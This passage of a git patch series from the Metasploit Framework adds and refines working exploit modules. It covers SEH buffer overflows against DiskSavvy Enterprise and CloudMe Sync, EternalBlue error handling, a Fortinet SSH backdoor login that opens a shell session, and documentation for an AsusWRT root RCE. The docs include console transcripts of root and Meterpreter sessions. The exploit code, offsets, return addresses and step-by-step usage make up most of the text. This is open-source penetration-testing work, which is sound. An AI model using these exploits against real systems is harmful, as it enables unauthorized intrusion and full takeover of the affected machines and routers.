header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end \ No newline at end of file From 630e9dd0de96ebd86e053f86731e9e0182a97ee1 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 14 Feb 2018 20:40:32 +0000 Subject: [PATCH 10/33] Verification steps update --- .../modules/exploit/windows/misc/disk_savvy_adm.md | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md index ad83328205..0f655ba606 100644 --- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -3,13 +3,13 @@ [DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe). ## Verification Steps - 1. Install a vulnerable DiskSavvy Enterprise - 6. Start `msfconsole` - 3. Do `exploit/windows/misc/disk_savvy_adm` - 4. Do `set RHOST ip` - 5. Do `set PAYLOAD windows/shell/bind_tcp` - 13. Do `exploit` - 7. Enjoy you shell + 1. Install a vulnerable DiskSavvy Enterprise + 2. Start `msfconsole` + 3. Do `exploit/windows/misc/disk_savvy_adm` + 4. Do `set RHOST ip` + 5. Do `set PAYLOAD windows/shell/bind_tcp` + 6. Do `exploit` + 7. Enjoy you shell ## Scenarios From 651ddbb7eb3f93d38d4e1d81c5ac597287f90984 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Thu, 15 Feb 2018 10:09:07 +0000 Subject: [PATCH 11/33] Disk Savvy Server Buffer Overflow --- modules/exploits/windows/misc/disk_savvy_adm.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb index 1495ad5de3..db32093455 100644 --- a/modules/exploits/windows/misc/disk_savvy_adm.rb +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Disk Savvy Enterprise v10.4.18', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability - in Disk Savvy Enterprise v10.4.18, caused by improper bounds - checking of the request sent to the built-in server. This module + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module has been tested successfully on Windows 7 SP1 x86. }, 'License' => MSF_LICENSE, @@ -73,4 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(packet) handler end -end \ No newline at end of file +end From 74021d95702f26dbbe94b24ab420d7bd953f30d4 Mon Sep 17 00:00:00 2001 From: klayklogg Date: Wed, 21 Feb 2018 00:37:54 +1300 Subject: [PATCH 12/33] Fix silent fail on missing argument to wmap_sites -d idx --- plugins/wmap.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 6039d7a159..9016171098 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin end when '-d' del_idx = args - if del_idx + if !del_idx.empty? delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq) return else - print_error("Provide index of site to delete") + print_error("No index provided.") end when '-l' view_sites From ea9b6d894d2870a13b3abc3aa822619c981b6551 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 20 Feb 2018 09:38:24 -0600 Subject: [PATCH 13/33] add missing payload specs --- spec/modules/payloads_spec.rb | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 8cf970240b..ae0e104270 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'osx/x64/exec' end + context 'osx/x64/meterpreter/bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/bind_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/bind_tcp' + end + + context 'osx/x64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/reverse_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/reverse_tcp' + end + context 'osx/x64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From f89cebbd89f5957473da3d9e1b7da622c691bd9f Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Tue, 20 Feb 2018 19:35:10 +0000 Subject: [PATCH 14/33] Add sploit doc --- .../exploit/linux/http/asuswrt_lan_rce.md | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/asuswrt_lan_rce.md diff --git a/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md new file mode 100644 index 0000000000..914f862489 --- /dev/null +++ b/documentation/modules/exploit/linux/http/asuswrt_lan_rce.md @@ -0,0 +1,70 @@ +## Description + + This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`. + + +## Vulnerable Application + + The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to perform a HTTP `POST` in certain cases. This can be combined with another vulnerability in the VPN configuration upload routine that sets NVRAM configuration variables directly from the `POST` request to enable a special command mode. + + This command mode can then be abused by sending a UDP packet to the infosvr service, which is running on port UDP 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user. + + This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743. + + Numerous ASUS models are reportedly affected, but untested. + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploits/linux/http/asuswrt_lan_rce` + 3. `set RHOST [IP]` + 4. `run` + 5. You should get a *root* session + + +## Options + + **ASUSWRTPORT** + + AsusWRT HTTP portal port (default: `80`) + + +## Scenarios +msf > use exploit/linux/http/asuswrt_lan_rce +msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205 +rhost => 192.168.132.205 +msf exploit(linux/http/asuswrt_lan_rce) > run + +[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable. +[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332 +[+] 192.168.132.205:9999 - Success, shell incoming! +[*] Found shell. +[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600 + +id +id +/bin/sh: id: not found +/ # cat /proc/cpuinfo +cat /proc/cpuinfo +system type : Broadcom BCM53572 chip rev 1 pkg 8 +processor : 0 +cpu model : MIPS 74K V4.9 +BogoMIPS : 149.91 +wait instruction : no +microsecond timers : yes +tlb_entries : 32 +extra interrupt vector : no +hardware watchpoint : yes +ASEs implemented : mips16 dsp +shadow register sets : 1 +VCED exceptions : not available +VCEI exceptions : not available + +unaligned_instructions : 0 +dcache hits : 2147483648 +dcache misses : 0 +icache hits : 2147483648 +icache misses : 0 +instructions : 2147483648 +/ # From d02bf40d691a1cd6216d24fd047e09a13aa6d34f Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 15:35:43 -0600 Subject: [PATCH 15/33] Modified Exploit Remove NOPS that weren't needed and freed up space for a larger payload. [ticket: #9561] --- modules/exploits/windows/misc/disk_savvy_adm.rb | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb index db32093455..de4da979a3 100644 --- a/modules/exploits/windows/misc/disk_savvy_adm.rb +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, @@ -30,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'BadChars' => "\x00\x02\x0a\x0d\xf8", - 'Space' => 355 + 'Space' => 800 }, 'Targets' => [ @@ -50,16 +51,16 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit + seh = generate_seh_record(target.ret) connect buffer = make_nops(target['Offset']) - buffer << "\x90\x09\xEB\x05" - buffer << [target.ret].pack('V') - buffer << make_nops(10) - buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,100").encode_string * 20 - buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp esp").encode_string - buffer << make_nops(441) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) header = "\x75\x19\xba\xab" header << "\x03\x00\x00\x00" From ab6f6d75d2e79a61f52013d0445d9f0fa1478f2f Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 15:37:40 -0600 Subject: [PATCH 16/33] Update Documentation [ticket: #9561] --- .../modules/exploit/windows/misc/disk_savvy_adm.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md index 0f655ba606..056f7bdd15 100644 --- a/documentation/modules/exploit/windows/misc/disk_savvy_adm.md +++ b/documentation/modules/exploit/windows/misc/disk_savvy_adm.md @@ -5,15 +5,15 @@ ## Verification Steps 1. Install a vulnerable DiskSavvy Enterprise 2. Start `msfconsole` - 3. Do `exploit/windows/misc/disk_savvy_adm` + 3. Do `use exploit/windows/misc/disk_savvy_adm` 4. Do `set RHOST ip` 5. Do `set PAYLOAD windows/shell/bind_tcp` 6. Do `exploit` - 7. Enjoy you shell + 7. Enjoy your shell ## Scenarios -###DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 +### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86 ``` msf > use exploit/windows/misc/disk_savvy_adm From d6206dc046c95fdac31c6f4274d805932dbe54c2 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 20 Feb 2018 15:48:00 -0600 Subject: [PATCH 17/33] Better regex in finger_users --- .../auxiliary/scanner/finger/finger_users.rb | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/finger/finger_users.rb b/modules/auxiliary/scanner/finger/finger_users.rb index fbe018977d..6873c06844 100644 --- a/modules/auxiliary/scanner/finger/finger_users.rb +++ b/modules/auxiliary/scanner/finger/finger_users.rb @@ -34,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary finger_zero finger_dot finger_chars - vprint_status "#{rhost}:#{rport} - Sending finger request for user list: #{finger_user_common.join(", ")}" + vprint_status "#{rhost}:#{rport} - Sending finger request for #{finger_user_common.count} users" finger_list rescue ::Rex::ConnectionError @@ -168,22 +168,21 @@ class MetasploitModule < Msf::Auxiliary # No such file or directory == valid user bad utmp - # Solaris - if(line =~ /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/) + + case line + when /^([a-z0-9\.\_]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)\s+([^\s]+)/ + # Solaris uid = $1 if ($2 != "Name") @users[uid] ||= {} end - end - # IRIX - if(line =~ /^\s*Login name:\s*([^\s]+)\s+/i) + when /^\s*Login name:\s*([^\s]+)\s+/i + # IRIX uid = $1 @users[uid] ||= {} if uid - end - - # Debian GNU/Linux - if(line =~ /^\s*Username:\s*([^\s]+)\s+/i) + when /^\s*(?:Username|Login):\s*([^\s]+)\s+/i + # Debian GNU/Linux uid = $1 @users[uid] ||= {} if uid end From ff3b318abde1ad288cce9b1cef3ae9846b63ea2b Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 21:56:31 +0000 Subject: [PATCH 18/33] CloudMe Sync Client documentation --- .../exploit/windows/misc/cloudme_sync.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/exploit/windows/misc/cloudme_sync.md diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md new file mode 100644 index 0000000000..04e5edb6a7 --- /dev/null +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -0,0 +1,66 @@ + +## Verification Steps + 1. Install CloudMe for Desktop version `v1.10.9` + 2. Create a free account and start the applicaton + 6. Start `msfconsole` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` + 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` + 12. Do `set LHOST ip` + 13. Do `exploit` + 14. Verify the Meterpreter session is opened + +## Scenarios + +### CloudMe Sync client application on Windows 7 SP1 + +``` +msf > use exploit/windows/misc/cloudme_sync +msf exploit(windows/misc/cloudme_sync) > show options + +Module options (exploit/windows/misc/cloudme_sync): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOST 172.16.40.148 yes The target address + RPORT 8888 yes The target port (TCP) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 172.16.40.5 yes The listen address + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 CloudMe Sync v1.10.9 + + +msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 +RHOST => 172.16.40.148 +msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp +PAYLOAD => windows/meterpreter/reverse_tcp +msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5 +LHOST => 172.16.40.5 +msf exploit(windows/misc/cloudme_sync) > exploit + +[*] Started reverse TCP handler on 172.16.40.5:4444 +[*] Sending stage (179779 bytes) to 172.16.40.148 +[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000 + +meterpreter > sysinfo +Computer : PC +OS : Windows 7 (Build 7601, Service Pack 1). +Architecture : x86 +System Language : pt_PT +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +meterpreter > +``` \ No newline at end of file From 745ad4d727b83c5c667c27714849b04528891c0e Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 21:57:13 +0000 Subject: [PATCH 19/33] CloudMe Sync Client BoF --- modules/exploits/windows/misc/cloudme_sync.rb | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/exploits/windows/misc/cloudme_sync.rb diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb new file mode 100644 index 0000000000..017a46b1e5 --- /dev/null +++ b/modules/exploits/windows/misc/cloudme_sync.rb @@ -0,0 +1,69 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CloudMe Sync v1.10.9', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in CloudMe Sync v1.10.9 client application. This module has been + tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hyp3rlinx', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'References' => + [ + [ 'CVE', '2018-6892'], + [ 'EDB', '44027' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ 'CloudMe Sync v1.10.9', + { + 'Offset' => 2232, + 'Ret' => 0x61e7b7f6 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 17 2018', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(8888)]) + + end + + def exploit + connect + + buffer = make_nops(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << make_nops(10) + buffer << payload.encoded + buffer << make_nops(5600) + + sock.put(buffer) + handler + end +end From 04882b046447b03f1cb278e7bfbf8556afb3ba39 Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Tue, 20 Feb 2018 22:00:36 +0000 Subject: [PATCH 20/33] Fixed indentation --- .../modules/exploit/windows/misc/cloudme_sync.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 04e5edb6a7..13e32e217c 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -1,10 +1,10 @@ ## Verification Steps - 1. Install CloudMe for Desktop version `v1.10.9` + 1. Install CloudMe for Desktop version `v1.10.9` 2. Create a free account and start the applicaton 6. Start `msfconsole` - 4. Do `use exploit/windows/misc/cloudme_sync` - 5. Do `set RHOST ip` + 4. Do `use exploit/windows/misc/cloudme_sync` + 5. Do `set RHOST ip` 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` 12. Do `set LHOST ip` 13. Do `exploit` @@ -63,4 +63,4 @@ Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > -``` \ No newline at end of file +``` From 6a62ca15e70e8cd8d7004de3d7fb14cb0953825a Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 17:40:33 -0600 Subject: [PATCH 21/33] Remove NOPS [ticket: #9594] --- modules/exploits/windows/misc/cloudme_sync.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb index 017a46b1e5..5d6d885004 100644 --- a/modules/exploits/windows/misc/cloudme_sync.rb +++ b/modules/exploits/windows/misc/cloudme_sync.rb @@ -59,9 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote buffer = make_nops(target['Offset']) buffer << generate_seh_record(target.ret) - buffer << make_nops(10) buffer << payload.encoded - buffer << make_nops(5600) sock.put(buffer) handler From a23240a742886fcc6a3042741f5274a66e55ef77 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 20 Feb 2018 17:48:21 -0600 Subject: [PATCH 22/33] Update Documentation [ticket: #9594] --- .../exploit/windows/misc/cloudme_sync.md | 41 ++++--------------- 1 file changed, 8 insertions(+), 33 deletions(-) diff --git a/documentation/modules/exploit/windows/misc/cloudme_sync.md b/documentation/modules/exploit/windows/misc/cloudme_sync.md index 13e32e217c..dad36f3df3 100644 --- a/documentation/modules/exploit/windows/misc/cloudme_sync.md +++ b/documentation/modules/exploit/windows/misc/cloudme_sync.md @@ -1,47 +1,22 @@ +## Description +This module exploits a buffer overflow vulnerability in [CloudMe Sync v1.10.9](https://www.cloudme.com/downloads/CloudMe_1109.exe). ## Verification Steps 1. Install CloudMe for Desktop version `v1.10.9` - 2. Create a free account and start the applicaton - 6. Start `msfconsole` + 2. Start the applicaton (you don't need to create an account) + 3. Start `msfconsole` 4. Do `use exploit/windows/misc/cloudme_sync` 5. Do `set RHOST ip` - 11. Do `set PAYLOAD windows/meterpreter/reverse_tcp` - 12. Do `set LHOST ip` - 13. Do `exploit` - 14. Verify the Meterpreter session is opened + 6. Do `set LHOST ip` + 7. Do `exploit` + 8. Verify the Meterpreter session is opened ## Scenarios -### CloudMe Sync client application on Windows 7 SP1 +### CloudMe Sync client application on Windows 7 SP1 x86 ``` msf > use exploit/windows/misc/cloudme_sync -msf exploit(windows/misc/cloudme_sync) > show options - -Module options (exploit/windows/misc/cloudme_sync): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST 172.16.40.148 yes The target address - RPORT 8888 yes The target port (TCP) - - -Payload options (windows/meterpreter/reverse_tcp): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) - LHOST 172.16.40.5 yes The listen address - LPORT 4444 yes The listen port - - -Exploit target: - - Id Name - -- ---- - 0 CloudMe Sync v1.10.9 - - msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148 RHOST => 172.16.40.148 msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp From af45c1764b23aeac1294f4aeea046a8602476cf1 Mon Sep 17 00:00:00 2001 From: Aaron Soto Date: Wed, 21 Feb 2018 13:40:04 -0600 Subject: [PATCH 23/33] Tweak exception handling and timing of `ms17_010_eternalblue` --- .../windows/smb/ms17_010_eternalblue.rb | 24 +++++++++++++++---- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 34582476a6..022cfe0a6f 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'thread', + 'WfsDelay' => 5, }, 'Privileged' => true, 'Payload' => @@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote # we don't need this sleep, and need to find a way to remove it # problem is session_count won't increment until stage is complete :\ secs = 0 - while !session_created? and secs < 5 + while !session_created? and secs < 30 secs += 1 sleep 1 end @@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote rescue EternalBlueError => e print_error("#{e.message}") + return false + rescue ::RubySMB::Error::NegotiationFailure + print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.") + return false rescue ::RubySMB::Error::UnexpectedStatusCode, ::Errno::ECONNRESET, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, - ::Rex::ConnectionRefused => e + ::Rex::ConnectionRefused, + ::RubySMB::Error::CommunicationError => e print_error("#{e.class}: #{e.message}") + report_failure + return false rescue => error print_error(error.class.to_s) print_error(error.message) print_error(error.backtrace.join("\n")) + return false ensure # pass end @@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote end end + ''' # # Increase the default delay by five seconds since some kernel-mode # payloads may not run immediately. @@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay super + 5 end - + ''' def smb2_grooms(grooms, payload_hdr_pkt) grooms.times do |groom_id| @@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Sending malformed Trans2 packets") sock.put(trans2_pkt_nulled) - sock.get_once + begin + sock.get_once + rescue EOFError + vprint_error("No response back from SMB echo request. Continuing anyway...") + end client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00") end From 854ac67b8e96dcf9d1b83ee3083a0340a0801601 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 15:21:14 -0600 Subject: [PATCH 24/33] Use start_session in fortinet_backdoor Still get "Unknown admin user ''" from a shell channel request, @busterb's more complete implementation notwithstanding. Hoping we fix this in a subsequent commit or related PR. Please see #6612 and #9524. --- .../scanner/ssh/fortinet_backdoor.rb | 34 ++++++++++++++----- 1 file changed, 25 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index e06d3100f5..6e2ec3a374 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet include Msf::Auxiliary::Scanner + include Msf::Auxiliary::CommandShell include Msf::Auxiliary::Report def initialize(info = {}) @@ -63,15 +64,30 @@ class MetasploitModule < Msf::Auxiliary return end - if ssh - print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") - report_vuln( - host: ip, - name: self.name, - refs: self.references, - info: ssh.transport.server_version.version - ) - end + return unless ssh + + print_good("#{ip}:#{rport} - Logged in as Fortimanager_Access") + + version = ssh.transport.server_version.version + + report_vuln( + host: ip, + name: self.name, + refs: self.references, + info: version + ) + + shell = Net::SSH::CommandStream.new(ssh) + + return unless shell + + info = "Fortinet SSH Backdoor (#{version})" + + ds_merge = { + 'USERNAME' => 'Fortimanager_Access' + } + + start_session(self, info, ds_merge, false, shell.lsock) end def rport From a5d78b82d4651ad75160d3864a99160ef4c87be9 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 15:51:53 -0600 Subject: [PATCH 25/33] Add require for Net::SSH::CommandStream --- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 6e2ec3a374..a07ad0243a 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -3,6 +3,9 @@ # Current source: https://github.com/rapid7/metasploit-framework ## +# XXX: This shouldn't be necessary but is now +require 'net/ssh/command_stream' + class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SSH include Msf::Exploit::Remote::Fortinet From cc2495dd9ca208e87b8203d06aeddf2c51715d8e Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 17:00:43 -0600 Subject: [PATCH 26/33] Explain fortinet-backdoor -> FortinetBackdoor --- modules/auxiliary/scanner/ssh/fortinet_backdoor.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index a07ad0243a..630b1a6f85 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -49,6 +49,8 @@ class MetasploitModule < Msf::Auxiliary ssh_opts = { port: rport, + # The auth method is converted into a class name for instantiation, + # so fortinet-backdoor here becomes FortinetBackdoor from the mixin auth_methods: ['fortinet-backdoor'], non_interactive: true, config: false, From 3880f6a65e73204977ec41de2a8fbabedcf30972 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 21 Feb 2018 20:05:02 -0600 Subject: [PATCH 27/33] Finally fix "Unknown admin user ''" after 2yrs The failed password auth was necessary after all. I misread the PoC. :'( Apparently the password auth sets the username, while the backdoored keyboard-interactive auth sets the password. --- lib/msf/core/exploit/fortinet.rb | 36 +++++++++++++------ .../scanner/ssh/fortinet_backdoor.rb | 3 ++ 2 files changed, 29 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb index 9b8aae1f9c..6072eccbff 100644 --- a/lib/msf/core/exploit/fortinet.rb +++ b/lib/msf/core/exploit/fortinet.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +# https://www.ietf.org/rfc/rfc4252.txt # https://www.ietf.org/rfc/rfc4256.txt require 'net/ssh' @@ -11,21 +12,21 @@ module Msf::Exploit::Remote::Fortinet USERAUTH_INFO_RESPONSE = 61 def authenticate(service_name, username = 'Fortimanager_Access', password = nil) - debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (password)' } send_message(userauth_request( =begin - string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) - string service name (US-ASCII) - string "keyboard-interactive" (US-ASCII) - string language tag (as defined in [RFC-3066]) - string submethods (ISO-10646 UTF-8) + string user name + string service name + string "password" + boolean FALSE + string plaintext password in ISO-10646 UTF-8 encoding [RFC3629] =end username, service_name, - 'keyboard-interactive', - '', - '' + 'password', + false, + password || '' )) loop do @@ -37,7 +38,22 @@ module Msf::Exploit::Remote::Fortinet return true when USERAUTH_FAILURE debug { 'Received SSH_MSG_USERAUTH_FAILURE' } - return false + debug { 'Sending SSH_MSG_USERAUTH_REQUEST (keyboard-interactive)' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) when USERAUTH_INFO_REQUEST debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 630b1a6f85..70e83503f2 100644 --- 